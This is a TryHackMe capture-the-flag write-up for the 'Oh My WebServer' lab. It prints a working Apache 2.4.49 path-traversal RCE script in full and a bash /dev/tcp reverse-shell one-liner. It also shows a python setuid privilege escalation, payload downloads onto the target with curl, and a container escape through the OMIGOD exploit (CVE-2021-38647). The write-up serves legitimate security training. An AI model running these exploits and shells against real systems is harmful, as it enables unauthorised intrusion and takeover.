THM Writeup – Oh My WebServer

THM Writeup – Oh My WebServer

Oh My WebServer

Can you root me?

Room: Oh My WebServer

Difficulty: Medium

Operating System: Linux

Author: tinyb0y

Add IP address to your hosts file:

echo '10.10.79.128    webserver.thm' >> /etc/hosts

Scan the target machine – find open ports first:

nmap -n -Pn -sS -p- --open -min-rate 5000 -vvv webserver.thm

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 63

Get more details about open ports:

nmap -T4 -A -p 22,80 webserver.thm

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.49 ((Unix))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.49 (Unix)
|_http-title: Consult - Business Consultancy Agency Template | Home

Directory brute-force the web application:

gobuster dir -u http://webserver.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt

===============================================================
/index.html (Status: 200)
/assets (Status: 301)
===============================================================

Nothing interesting, I also viewed the page source, found nothing interesting as well.

Let’s try to check if the Apache version is vulnerable – search (google) for apache 2.4.49 exploit:

apache exploit search results

We found this exploit:

# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
# Date: 10/05/2021
# Exploit Author: Lucas Souza https://lsass.io
# Vendor Homepage:  https://apache.org/
# Version: 2.4.49
# Tested on: 2.4.49
# CVE : CVE-2021-41773
# Credits: Ash Daulton and the cPanel Security Team

#!/bin/bash

if [[ $1 == '' ]]; [[ $2 == '' ]]; then
echo Set [TAGET-LIST.TXT] [PATH] [COMMAND]
echo ../PoC.sh targets.txt /etc/passwd
exit
fi
for host in $(cat $1); do
echo $host
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done

# PoC.sh targets.txt /etc/passwd
# PoC.sh targets.txt /bin/sh whoami

Save the exploit to a file named e.g. PoC.sh.

Create targets.txt file and make PoC.sh file executable:

echo 'webserver.thm' > targets.txt
chmod +x PoC.sh

Now run the exploit:

root@ip-10-10-143-108:~# ../PoC.sh targets.txt /bin/sh whoami
webserver.thm
daemon

Great, the exploit works, so let’s get a reverse shell now.

Open another terminal window and run netcat listener:

nc -lnvp 4242

And run the exploit again, this time with different command (don’t forget to change IP and Port):

../PoC.sh targets.txt /bin/bash 'bash -i >& /dev/tcp/10.10.143.108/4242 0>&1'

And we received a reverse shell:

reverse shell

Try to find user flag:

daemon@4a70924bafa0:/bin$ ls -lA /home
ls -lA /home
total 0
daemon@4a70924bafa0:/bin$ ls -lA /
ls -lA /
total 68
-rwxr-xr-x   1 root root    0 Feb 23 06:21 .dockerenv
drwxr-xr-x   1 root root 4096 Oct  8 05:30 bin
drwxr-xr-x   2 root root 4096 Jun 13  2021 boot
drwxr-xr-x   5 root root  340 Mar  7 08:30 dev
drwxr-xr-x   1 root root 4096 Feb 23 06:21 etc
drwxr-xr-x   2 root root 4096 Jun 13  2021 home
drwxr-xr-x   1 root root 4096 Oct  8 05:36 lib
drwxr-xr-x   2 root root 4096 Sep 27 00:00 lib64
drwxr-xr-x   2 root root 4096 Sep 27 00:00 media
drwxr-xr-x   2 root root 4096 Sep 27 00:00 mnt
drwxr-xr-x   2 root root 4096 Sep 27 00:00 opt
dr-xr-xr-x 167 root root    0 Mar  7 08:30 proc
drwx------   1 root root 4096 Oct  8 08:28 root
drwxr-xr-x   3 root root 4096 Sep 27 00:00 run
drwxr-xr-x   1 root root 4096 Oct  8 08:10 sbin
drwxr-xr-x   2 root root 4096 Sep 27 00:00 srv
dr-xr-xr-x  13 root root    0 Mar  7 08:30 sys
drwxrwxrwt   1 root root 4096 Feb 23 05:39 tmp
drwxr-xr-x   1 root root 4096 Sep 27 00:00 usr
drwxr-xr-x   1 root root 4096 Sep 27 00:00 var

As we can see there is no user home directory and we are probably in a docker container – so I guess the user flag is in the /root directory = we need to escalate our privileges.

Do basic enumeration:

daemon@4a70924bafa0:/bin$ getcap -r / 2>/dev/null
getcap -r / 2>/dev/null
/usr/bin/python3.7 = cap_setuid+ep

Nice, python3.7 executable has the capability to set the UID.

Check GTFOBins to find a way to exploit it:

gtfobins

Now exploit it:

daemon@4a70924bafa0:/bin$ python3.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
id
uid=0(root) gid=1(daemon) groups=1(daemon)

Now we are root user inside a docker container so we can get the user flag:

cat /root/user.txt
[REDACTED]

Upgrade the shell:

python3 -c 'import pty;pty.spawn("/bin/bash");'
CTRL+Z
stty raw -echo; fg ENTER ENTER
stty rows 24 columns 80
export TERM=xterm-256color

Download the linux enumeration script to your attacking machine and start a web server:

wget https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fpull%2F260%2Fmerge/linpeas.sh
python3 -m http.server 9000

Go to the target machine’s terminal and download the linpeas.sh:

root@4a70924bafa0:/tmp# curl http://10.10.143.108:9000/linpeas.sh -o linpeas.sh
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                  Dload  Upload   Total   Spent    Left  Speed
100  745k  100  745k    0     0  51.9M      0 --:--:-- --:--:-- --:--:-- 51.9M

We had to use curl since wget is not installed…

Now run the enumeration script:

sh linpeas.sh | tee -a linpeas.log

Read the log file:

less -R linpeas.log

Found nothing of interest.

For some time I couldn’t find a way out of the container. Then I realized we are in a container there must be a host, let’s try to find/guess its IP address – first check container’s IP address:

root@4a70924bafa0:/tmp# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.0.2  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:ac:11:00:02  txqueuelen 0  (Ethernet)
        RX packets 928694  bytes 153059413 (145.9 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1315865  bytes 406394848 (387.5 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Ok, container’s IP address is 172.17.0.2 so host’s IP address might be 172.17.0.1 – let’s confirm this assumption by using nmap.

Go to your attacking machine terminal, download the nmap static binary to the current directory and run a webserver:

wget https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/nmap
python3 -m http.server 9000

Now go back to target machine’s terminal, download nmap and make it executable:

root@4a70924bafa0:/tmp# curl http://10.10.143.108:9000/nmap -o nmap
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                  Dload  Upload   Total   Spent    Left  Speed
100 2892k  100 2892k    0     0  91.1M      0 --:--:-- --:--:-- --:--:-- 91.1M
root@4a70924bafa0:/tmp# chmod +x nmap

Run the nmap scan against 172.17.0.1:

root@4a70924bafa0:/tmp# ../nmap -n -Pn -sS -p- --open -min-rate 5000 -vvv 172.17.0.1

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 64
80/tcp   open  http    syn-ack ttl 64
5986/tcp open  unknown syn-ack ttl 64

Now check port 5986 – search for port 5986 used for:

port 5986 search results

Ok, PowerShell encrypted port – there might be a way to exploit it.

Search for port 5986 exploit:

port 5986 exploit search results

I found 2 excelent articles about abusing WinRM:

I read through them, learned something new again, however I had a feeling this is not the right way in our case. So I searched more, scrolled down the google search result page and found this article about OMIGOD service:

omigod vulnerabilities

The only usable in our case is CVE-2021-38647, so try to find a way to exploit it – search for CVE-2021-38647 exploitation:

CVE-2021-38647 search results

We found proof-of-concept to exploit CVE-2021-38647

Reading through readme we see there are exploits for PowerShell and Python, we’re going to use Python.

Download CVE-2021-38647.py to your attacking machine and run a web server:

wget https://raw.githubusercontent.com/AlteredSecurity/CVE-2021-38647/main/CVE-2021-38647.py
python3 -m http.server 9000

Go to the target machine’s terminal, download the exploit from your attacking machine and make it executable:

root@4a70924bafa0:/tmp# curl http://10.10.143.108:9000/CVE-2021-38647.py -o CVE-2021-38647.py
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                  Dload  Upload   Total   Spent    Left  Speed
100  5246  100  5246    0     0  1024k      0 --:--:-- --:--:-- --:--:-- 1024k
root@4a70924bafa0:/tmp# chmod +x CVE-2021-38647.py

Python usage according to README.md:

CVE-2021-38647 python usage

Execute the exploit:

root@4a70924bafa0:/tmp# python3 CVE-2021-38647.py -t 172.17.0.1 -p 5986 -c 'id;cat /root/root.txt'
uid=0(root) gid=0(root) groups=0(root)
[REDACTED]

Do you like this writeup? Check out other THM Writeups.

Comments are closed.